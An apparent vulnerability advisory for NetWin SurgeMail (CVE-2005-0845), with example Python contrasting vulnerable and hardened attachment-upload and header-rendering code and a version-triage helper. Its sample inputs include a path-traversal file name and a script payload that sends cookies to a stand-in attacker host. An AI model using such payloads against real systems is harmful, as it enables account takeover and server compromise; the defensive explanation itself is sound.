NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
BID:12866
Info
| Bugtraq ID: | 12866 |
| Class: | Unknown |
| CVE: | CVE-2005-0845 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 22 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Tan Chew Keong <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: | NetWin SurgeMail 3.0a, 2.2g3, 2.2g2, 2.2c9, 2.2c10, 2.2a6, 2.1c7, 2.1a, 2.0g2, 2.0e, 2.0c, 2.0a2, 1.9b2, 1.9, 1.8g3, 1.8e, 1.8d, 1.8b3, 1.8a |
| Not Vulnerable: | NetWin SurgeMail 3.0c2 |
Discussion
Multiple remote file upload and HTML injection vulnerabilities affect NetWin SurgeMail. The underlying causes are a failure to sanitize user-supplied input before it is rendered as HTML (the cross-site scripting issue named in the researcher's advisory) and a failure to securely handle the webmail attachment upload functionality.
These issues may be leveraged to upload arbitrary files into arbitrary locations writable by the affected application, and to carry out HTML injection attacks against the SurgeMail administrator. This may facilitate theft of credentials and potentially compromise of the email server.
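The two bug classes the advisory names, shown side by side with a hardened form. This is example code added here for illustration; it is not SurgeMail's code and does not reflect how SurgeMail's webmail is implemented. The function names, the attachment directory, and the sample file names and subject line are all constructed assumptions.

```python
"""Illustration of the two bug classes named in this advisory (example code
written for this page, not SurgeMail's own): an attachment upload that trusts
the client-supplied file name, and a mailbox view that echoes a message header
into the administrator's browser without HTML-escaping it, each beside a
hardened form. All names and inputs below are assumptions."""
import html
import re
from pathlib import Path

# Constructed sample inputs (not taken from the advisory).
ATTACHMENT_ROOT = "/srv/webmail/attachments"
TRAVERSAL_NAME = "../../cgi-bin/backdoor.cgi"
WINDOWS_NAME = "C:\\Windows\\Temp\\evil.exe"
INJECTED_SUBJECT = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'


def is_within(root: Path, candidate: Path) -> bool:
    """True if candidate, after '..' and symlink resolution, stays under root."""
    root = root.resolve()
    candidate = candidate.resolve()
    return candidate == root or root in candidate.parents


def attachment_path_vulnerable(upload_dir: str, client_filename: str) -> Path:
    """Joins the client-controlled name straight onto the upload directory.

    '../' segments (or an absolute path) let the sender choose any location the
    server process can write to: the file upload issue class in this advisory."""
    return Path(upload_dir) / client_filename


def vulnerable_join_escapes(upload_dir: str, client_filename: str) -> bool:
    """Does the naive join land outside the upload directory?"""
    return not is_within(Path(upload_dir), attachment_path_vulnerable(upload_dir, client_filename))


# Allowlist: a leading alphanumeric, then a bounded run of safe characters.
# This rejects '.', '..', hidden files and anything containing a separator.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def attachment_path_hardened(upload_dir: str, client_filename: str) -> Path:
    """Keeps only the last path component, validates it against the allowlist,
    and re-checks that the final destination is still inside the upload dir."""
    # Take the last component whichever separator the client used.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not SAFE_NAME.match(name):
        raise ValueError(f"rejected attachment name: {client_filename!r}")
    root = Path(upload_dir)
    dest = root / name
    if not is_within(root, dest):  # defence in depth; cannot trigger after the allowlist
        raise ValueError("destination escapes the upload directory")
    return dest


def accepts_attachment_name(upload_dir: str, client_filename: str) -> bool:
    """Convenience wrapper: does the hardened handler accept this name?"""
    try:
        attachment_path_hardened(upload_dir, client_filename)
        return True
    except ValueError:
        return False


def render_message_row_vulnerable(sender: str, subject: str) -> str:
    """Interpolates message headers into HTML as-is: script in a subject line
    runs in the browser of whoever (e.g. the administrator) views the mailbox."""
    return f"<tr><td>{sender}</td><td>{subject}</td></tr>"


def render_message_row_hardened(sender: str, subject: str) -> str:
    """Escapes '<', '>', '&' and quotes so header content is displayed as text."""
    return f"<tr><td>{html.escape(sender)}</td><td>{html.escape(subject)}</td></tr>"


if __name__ == "__main__":
    print("vulnerable join  :", attachment_path_vulnerable(ATTACHMENT_ROOT, TRAVERSAL_NAME).resolve())
    print("hardened join    :", attachment_path_hardened(ATTACHMENT_ROOT, TRAVERSAL_NAME))
    print("vulnerable render:", render_message_row_vulnerable("mallory@example.invalid", INJECTED_SUBJECT))
    print("hardened render  :", render_message_row_hardened("mallory@example.invalid", INJECTED_SUBJECT))
```

The hardened upload handler discards everything but the final path component, applies an allowlist rather than trying to strip traversal sequences, and still verifies the resolved destination against the upload root so a later change to the allowlist cannot silently reopen the hole; the hardened renderer escapes at the output point, which is where HTML injection is actually prevented.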
Exploit / POC
No exploit is required to leverage either of these issues.
Solution / Fix
Solution:
The vendor has released SurgeMail 3.0c2 to address these issues. Users running any of the releases listed as vulnerable above are advised to upgrade, and to contact the vendor for more information on obtaining upgraded packages.
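A triage helper for checking an inventory of SurgeMail installations against the fixed release named above. This is example code added here, not NetWin's; it parses the major.minor[letter[patch]] labels used on this page (e.g. "2.2c10", "3.0a", "1.9") and takes the conservative reading that every release older than 3.0c2 is affected, since 3.0c2 is the only release the advisory lists as not vulnerable. It makes no assumption about where you obtain the version string (banner, admin page, package list); the lists embedded below are the page's own.

```python
"""Version triage against this advisory (example code written for this page,
not NetWin's). Parses SurgeMail release labels and reports whether a label is
older than the 3.0c2 fix. Label format is inferred from the versions listed on
this page; the comparison rule (everything below 3.0c2 is affected) is the
conservative reading of the advisory's own vulnerable / not-vulnerable lists."""
import re
from typing import List, Tuple

FIXED_IN = "3.0c2"  # the "Not Vulnerable" entry in this advisory

# Vulnerable releases exactly as listed on this page, in NetWin's compact spelling.
VULNERABLE_PER_ADVISORY = [
    "3.0a", "2.2g3", "2.2g2", "2.2c9", "2.2c10", "2.2a6", "2.1c7", "2.1a",
    "2.0g2", "2.0e", "2.0c", "2.0a2", "1.9b2", "1.9", "1.8g3", "1.8e",
    "1.8d", "1.8b3", "1.8a",
]

# major.minor, optional release letter, optional patch number; spaces tolerated
# so "2.2 c10" (as the page prints it) parses the same as "2.2c10".
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\s*([A-Za-z])?\s*(\d+)?\s*$")


def parse_version(label: str) -> Tuple[int, int, str, int]:
    """'2.2c10' -> (2, 2, 'c', 10); '1.9' -> (1, 9, '', 0).

    A missing letter sorts before 'a' and a missing patch number counts as 0,
    so plain tuple comparison orders releases the way NetWin numbers them."""
    m = _VERSION_RE.match(label)
    if not m:
        raise ValueError(f"not a SurgeMail version label: {label!r}")
    major, minor, letter, patch = m.groups()
    return (int(major), int(minor), (letter or "").lower(), int(patch or 0))


def is_affected(label: str, fixed_in: str = FIXED_IN) -> bool:
    """Conservative rule: any release older than the fix is treated as affected."""
    return parse_version(label) < parse_version(fixed_in)


def triage(labels: List[str]) -> List[Tuple[str, bool]]:
    """Map each inventory label to (label, affected?)."""
    return [(label, is_affected(label)) for label in labels]


if __name__ == "__main__":
    for label, affected in triage(VULNERABLE_PER_ADVISORY + [FIXED_IN, "3.0c1", "3.1a"]):
        print(f"{label:8s} {'AFFECTED' if affected else 'ok'}")
```

Intermediate labels the advisory does not mention (3.0b, 3.0c1) are reported as affected by this rule; treat that as a prompt to upgrade rather than as a statement the page makes about those releases.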
References
References:
- SurgeMail Change History (NetWin)
- SurgeMail Home Page (NetWin)
- SurgeMail Webmail Attachment Upload and XSS Vulnerabilities (Tan Chew Keong)